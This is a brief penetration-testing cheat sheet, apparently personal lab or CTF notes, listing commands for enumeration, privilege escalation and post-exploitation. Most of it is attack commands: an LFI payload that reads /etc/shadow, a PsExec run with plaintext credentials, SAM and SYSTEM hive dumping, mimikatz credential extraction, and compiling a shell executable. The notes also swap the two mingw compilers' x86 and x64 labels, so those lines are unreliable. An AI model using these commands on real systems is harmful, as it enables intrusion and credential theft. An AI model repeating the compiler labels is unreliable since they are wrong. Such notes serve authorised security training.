1. Enumeration
    1.1  Nmap: 
        'nmap -sC -sV -oA enum/nmap <ip> -p-'
    1.2  nmapAutomator
        './nmapAutomator full ip'
    
2. Info gathering
    2.1 Linux 
        'LFI - php?list=../../../../../../../../../../etc/shadow'
    2.2 Windows
        'LFI -php?list=../../../../../../../../../../<>>>>'

 
 3. Enumeration
    3.1 Linux
        'find / -perm -u=s -type f 2>/dev/null'
    3.2 Windows
    
    
    
4. Privilege Escalation
    4.1 Linux
    4.2 Windows            ref: https://guif.re/windowseop#EoP%204:%20Pass%20the%20hash
        4.2.1 UAC Bypass   ref: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
            'Run whoami /priv'
            'Look for SeChangeNotifyPrivilege'       Bypass traverse checking             Enabled 
            'Download: https://github.com/turbo/zero2hero'
        4.2.2 Passing cred
            '/Psexec.exe /accepteula -user alice -p aliceishere -c ./8000.exe'   
            
 5. Post-Exploitation
    5.1 Linux
    5.2 Windows            ref : https://samsclass.info/123/proj10/px16-hashcat-win.htm
        5.2.1 Saving Creds         
            5.2.1.1 Manual
                Windows Hash: Security Accounts Manager
                    'reg save HKLM\SAM c:\SAM'
                    'reg save HKLM\System c:\System'
                        --> Then smbserver to save back to kali. 
                    'samdump2 System SAM'
            4.2.1.2 Auto
                Gain admin priviliege
                Run mimikatz
                    privilege::debug
                    token::elevate
                    lsadump::sam







https://docs.microsoft.com/en-us/sysinternals/downloads/psexec


Windows x86 Machine powershell location
    C:\Windows\System32\WindowsPowerShell\v1.0
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0
Windows x64 Machine Powershell location

Compiling C in Kali
    x86_64-w64-mingw32-gcc shell.c -o shell.exe  --> compile to x86
    i686-w64-mingw32-gcc shell.c -o shell.exe  --> compile to x64

Powershell command
    Download file 
    Invoke-WebRequest URL -OutFile c:\file.ext

